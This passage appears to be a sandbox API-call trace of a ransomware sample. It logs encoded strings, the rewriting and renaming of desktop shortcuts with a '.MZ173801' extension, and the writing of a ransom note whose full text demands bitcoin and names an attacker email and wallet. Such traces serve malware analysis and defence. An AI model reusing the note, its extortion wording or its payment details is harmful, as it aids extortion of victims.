lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.505] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.505] GetCurrentThreadId () returned 0x1358 [0124.505] GetCurrentThreadId () returned 0x1358 [0124.505] GetCurrentThreadId () returned 0x1358 [0124.505] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.505] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.506] GetCurrentThreadId () returned 0x1358 [0124.506] GetCurrentThreadId () returned 0x1358 [0124.506] GetCurrentThreadId () returned 0x1358 [0124.506] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0124.506] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0124.506] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0124.506] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3e7 [0124.506] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0124.506] ReadFile (in: hFile=0x40c, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x3e7, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x3e7, lpOverlapped=0x0) returned 1 [0124.507] CloseHandle (hObject=0x40c) returned 1 [0124.507] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0124.508] WriteFile (in: hFile=0x40c, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x3e7, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x3e7, lpOverlapped=0x0) returned 1 [0124.509] CloseHandle (hObject=0x40c) returned 1 [0124.509] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), lpNewFileName="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.MZ173801" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk.mz173801")) returned 1 [0124.510] GetCurrentThreadId () returned 0x1358 [0124.510] GetCurrentThreadId () returned 0x1358 [0124.510] GetCurrentThreadId () returned 0x1358 [0124.510] GetCurrentThreadId () returned 0x1358 [0124.510] GetCurrentThreadId () returned 0x1358 [0124.510] GetCurrentThreadId () returned 0x1358 [0124.510] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef84fc3f, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef84fc3f, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xef84fc3f, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 0 [0124.510] GetLastError () returned 0x12 [0124.510] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0124.510] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xab7d9f8e, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xab7d9f8e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0124.510] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xab7d9f8e, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xab7d9f8e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0124.510] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38bb5c78, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x38bb5c78, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xab7b3d63, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x852, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Acrobat Reader DC.lnk.MZ173801", cAlternateFileName="ACROBA~1.MZ1")) returned 1 [0124.510] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0124.510] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.510] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa08e58, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fb62ca, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fb62ca, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0124.510] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4c3ce2c, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xe4c3ce2c, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xab7b3d63, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x91a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Google Chrome.lnk.MZ173801", cAlternateFileName="GOOGLE~1.MZ1")) returned 1 [0124.510] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.510] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.510] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef84fc3f, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef84fc3f, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xab7d9f8e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk.MZ173801", cAlternateFileName="MOZILL~1.MZ1")) returned 1 [0124.510] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0124.510] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0124.510] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef84fc3f, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xef84fc3f, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xab7d9f8e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3e7, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk.MZ173801", cAlternateFileName="MOZILL~1.MZ1")) returned 0 [0124.510] GetLastError () returned 0x12 [0124.510] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0124.510] GetSystemDefaultLangID () returned 0xa10409 [0124.511] VerLanguageNameW (in: wLang=0x409, szLang=0x240fc60, cchLang=0xfa | out: szLang="English (United States)") returned 0x17 [0124.513] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb3c, csidl=8, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent") returned 1 [0124.514] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent")) returned 0x11 [0124.514] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb3c, csidl=8, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent") returned 1 [0124.514] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\How Do I Recover My Files (Readme).txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\how do i recover my files (readme).txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.514] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.514] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2498 [0124.514] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/\r\n\r\n* What about guarantees?\r\nIts just a business. We absolutely do not care about you and your deals, except getting\r\nbenefits. If we do not do our work and liabilities - nobody will cooperate with us.\r\nIts not in our interests. To check the ability of returning files,\r\nyou can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!)\r\nand low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.\r\n\r\n* How to contact with you?\r\nYou can write us to our mailbox: mzrdecryptorbuy@firemail.cc\r\nWrite this ID in the title of your message: MZRID96A896E32E\r\nDon't forget, check your \"Spam\" or \"Junk\" folder it you can't get more than 6 hours of answer.\r\n\r\n* How will the decryption process proceed after payment?\r\nAfter payment, we will send you our special decoder program by mail, just open it,\r\nthen it will automatically decrypt all your files.\r\nbut you need to pay for it and contact us.\r\n\r\nIf you are ready to pay the money we want,\r\nBitcoin address to which you will send the payment: 3HYoqfBS1ZceA2AvmdEucbnEHp74nu9cjd\r\n\r\n:::BEWARE:::\r\nDON'T try to change encrypted files by yourself!\r\nIf you will try to use any third party software for restoring your data or antivirus\r\nsolutions - please make a backup for all encrypted files!\r\nAny changes in encrypted files may entail damage of the private key and, as result, the loss all data.\r\n", cchWideChar=2498, lpMultiByteStr=0x242ff88, cbMultiByte=2498, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="* What happened to my computer?\r\nYour important files are encrypted.\r\nMany of your documents, photos, videos, databases and other files are no longer\r\naccessible because they have been encrypted. Maybe you are busy looking for a way to\r\nrecover your files, but do not waste your time. Nobody can recover your files without\r\nour decryption service.\r\n\r\n* Can I Recover My Files?\r\nSure. We guarantee that you can recover all your files safely and easily.\r\nIf you want to decrypt your files, you need to send $1000 worth of bitcoin to our address.\r\nDiscount 90% available if you contact us first 24 hours, thats price for you is $100.\r\nDon't forget! If you do not pay within 96 hours (Europe/Istanbul),\r\nyou cannot recover your files forever.\r\n\r\n* What is bitcoin and how to get it?\r\nThe easiest way to buy bitcoins is LocalBitcoins site.\r\nYou have to register, click 'Buy bitcoins', and select the seller by 